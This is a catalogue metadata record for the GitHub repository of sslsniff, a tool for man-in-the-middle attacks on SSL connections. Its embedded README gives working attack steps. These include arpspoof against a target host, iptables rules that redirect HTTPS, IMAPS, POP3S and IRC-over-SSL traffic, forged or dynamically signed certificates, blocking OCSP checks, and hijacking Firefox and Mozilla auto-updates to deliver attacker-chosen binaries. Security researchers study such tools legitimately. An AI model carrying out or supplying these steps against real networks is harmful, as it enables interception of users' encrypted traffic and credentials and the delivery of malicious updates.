{"id":13827111,"url":"https://github.com/moxie0/sslsniff","last_synced_at":"2025-07-09T03:30:54.031Z","repository":{"id":37819184,"uuid":"1654700","full_name":"moxie0/sslsniff","owner":"moxie0","description":"A tool for automated MITM attacks on SSL connections.","archived":false,"fork":false,"pushed_at":"2017-12-17T19:04:09.000Z","size":609,"stargazers_count":546,"open_issues_count":29,"forks_count":118,"subscribers_count":43,"default_branch":"master","last_synced_at":"2024-11-20T06:34:12.475Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"C++","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/moxie0.png","metadata":{"files":{"readme":"README","changelog":"ChangeLog","contributing":null,"funding":null,"license":"COPYING","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2011-04-23T20:17:37.000Z","updated_at":"2024-09-25T04:27:03.000Z","dependencies_parsed_at":"2022-07-12T16:54:25.710Z","dependency_job_id":null,"html_url":"https://github.com/moxie0/sslsniff","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/moxie0/sslsniff","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/moxie0%2Fsslsniff","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/moxie0%2Fsslsniff/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/moxie0%2Fsslsniff/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/moxie0%2Fsslsniff/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/moxie0","download_url":"https://codeload.github.com/moxie0/sslsniff/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/moxie0%2Fsslsniff/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":264386238,"owners_count":23599962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-04T09:01:50.316Z","updated_at":"2025-07-09T03:30:53.716Z","avatar_url":"https://github.com/moxie0.png","language":"C++","funding_links":[],"categories":["C++","\u003ca id=\"42f9e068b6511bcbb47d6b2b273097da\"\u003e\u003c/a\u003e未分类"],"sub_categories":["\u003ca id=\"3bd67ee9f322e2c85854991c85ed6da0\"\u003e\u003c/a\u003e投毒\u0026\u0026Poisoning"],"readme":"sslsniff v0.8\nMoxie Marlinspike \u003cmoxie@thoughtcrime.org\u003e\n------------------------------------\n\nREQUIRES: openssl, libboost1.35-dev, libboost-filesystem1.35-dev, \n          libboost-thread1.35-dev, liblog4cpp5-dev, Linux 2.4/2.6 (or BSD)\n\nThe three steps to get this running are:\n\n    * Download and run sslsniff-0.8.tar.gz\n    * Setup iptables (or pf on BSD)\n    * Run arpspoof (or whatever method you'd like to use to redirect traffic).\n\nInstalling sslsniff\n-------------------\n\n    * Unpack sslsniff-0.8.tar.gz, run \"./configure\" and \"make\". (You'll have\n      to make some changes to build on BSD systems, see below under \"Setting up \n      pf\")\n    * There are two ways to run this: in \"authority\" mode or \"targeted\" mode.\n\n    Authority Mode:\n\n    In this mode, sslsniff acts as if it is a CA which dynamically generates\n    certificates on the fly.  If you were, for instance, able to obtain a CA\n    certificate somehow, you could run it in this mode and it would dynamically\n    create and sign new certificates for whatever site you're trying to connect\n    to.\n\n    This mode is also useful for exploiting implementations that do not properly\n    verify BasicConstraints, as any valid leaf node certificate could be used\n    instead of a CA cert.\n\n    You would run sslsniff as: \n    ./sslsniff -a -s \u003c$listenPort\u003e -w \u003c$logFile\u003e -c \u003c$caCert\u003e\n\n    Targeted Mode:\n\n    In this mode, sslsniff is given a directory full of certificates, which it \n    uses for targeted MITM attacks against the hosts those certificates are \n    signed for.  This mode is useful if you are able to forge specific \n    certificates, or if you have certificates that were obtained for the \"null \n    prefix\" vulnerability that I published.  There are sample null prefix \n    certificates in the \"certs\" directory that comes with sslsniff, but be\n    sure to specify \"-m IPSCACLASEA1.crt\" if you wish to use those. (Note:\n    the targeted certs have been removed for legal reasons, but the universal\n    wildcard cert remains)\n\n    You would run sslsniff as: \n    ./sslsniff -t -s \u003c$listenPort\u003e -w \u003c$logFile\u003e -m IPSCACLASEA1.crt \\\n      -c \u003c$certDir\u003e\n\n    Other options:\n    \n    * sslsniff can be configured to only attack certain clients.  In this case, \n      you need to specify -f \u003cff,ie,safari,opera\u003e -h \u003c$httpListenPort\u003e \n    \n    * sslsniff can be configured to deny OCSP requests from clients.  In this \n      case, you need to specify -d\n\n    * sslsniff can be configured to only log HTTP POSTS.  In this case, you \n      need to specify -p\n\n    * sslsniff can be configured to hijack Mozilla auto-updates.  In this case, \n      you need to specify -u \u003c$updateXmlDir\u003e, where $updateXmlDir contains the \n      XML files for whatever binaries you want to have sslsniff auto-update, \n      one for each platform.  There are sample XML files in the \"update\" \n      directory that comes with sslsniff.\n\n    * sslsniff can be configured to hijack Firefox/Thunderbird addon \n      auto-updates. In this case, you need to specify -e \u003curl\u003e -j \u003csha256sum\u003e \n      where \u003curl\u003e is the URL where your custom addon is located, and \u003csha256sum\u003e \n      is the sha256sum of that addon.\n\n\nSetting up iptables\n-------------------\n\n    * Flip your machine into ip_forward mode \n      (echo 1 \u003e /proc/sys/net/ipv4/ip_forward)\n\n    * Add a rule to intercept HTTPS traffic \n      (iptables -t nat -A PREROUTING -p tcp --destination-port 443\n       -j REDIRECT --to-ports \u003c$listenPort\u003e)\n\n    * If you're going to do client fingerprinting, add a rule to\n      intercept HTTP traffic:\n      (iptables -t nat -A PREROUTING -p tcp --destination-port 80\n      -j REDIRECT --to-ports \u003c$httpListenPort\u003e)\n\n    * Add a rule to intercept imaps traffic:\n      (iptables -t nat -A PREROUTING -p tcp --destination-port 993 \\\n       -j REDIRECT --to-ports \u003c$listenPort\u003e)\n\n    * Add a rule to intercept pop3s traffic:\n      (iptables -t nat -A PREROUTING -p tcp --destination-port 995 \\\n       -j REDIRECT --to-ports \u003c$listenPort\u003e)\n\n    * Add a rule to intercept irc over ssl traffic:\n      (iptables -t nat -A PREROUTING -p tcp --destination-port 6697 \\\n       -j REDIRECT --to-ports \u003c$listenPort\u003e)\n\nSetting up pf\n-------------\n\nBasic support for pf is now included. Set up firewall rules similar to\nthose above, and change util/Destination.cpp by undefining HAVE_NETFILTER\nand defining HAVE_PF at the top.\n\n\nRunning arpspoof\n--------------------------\n\nAssuming we want to intercept SSL traffic from 172.17.10.36, we need to \ntrick that host into thinking that we're the router.  Using arpspoof, we \ncan convince the target that the router's MAC address is our MAC address.\n\n    * arpspoof -i eth0 -t 172.17.10.36 172.17.8.1\n\nAt this point, any SSL traffic should get proxied by sslsniff and logged to \na file.\n\nHow does this work?\n-------------------\n\nFirst, arpspoof convinces a host that our MAC address is the router's MAC \naddress, and the target begins to send us all its network traffic.  The \nkernel forwards everything along except for traffic destined to port 443, \nwhich it redirects to $listenPort (10000, for example).\n\nAt this point, sslsniff receives the client connection, makes a connection \nto the real SSL site, and looks at the information in its certificate.  \nsslsniff then either sends a forged certificate if available \n(targeted certificate mode), or it dynamically forges a certificate and signs\nit with your authoritative certificate (authority mode).\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmoxie0%2Fsslsniff","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fmoxie0%2Fsslsniff","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmoxie0%2Fsslsniff/lists"}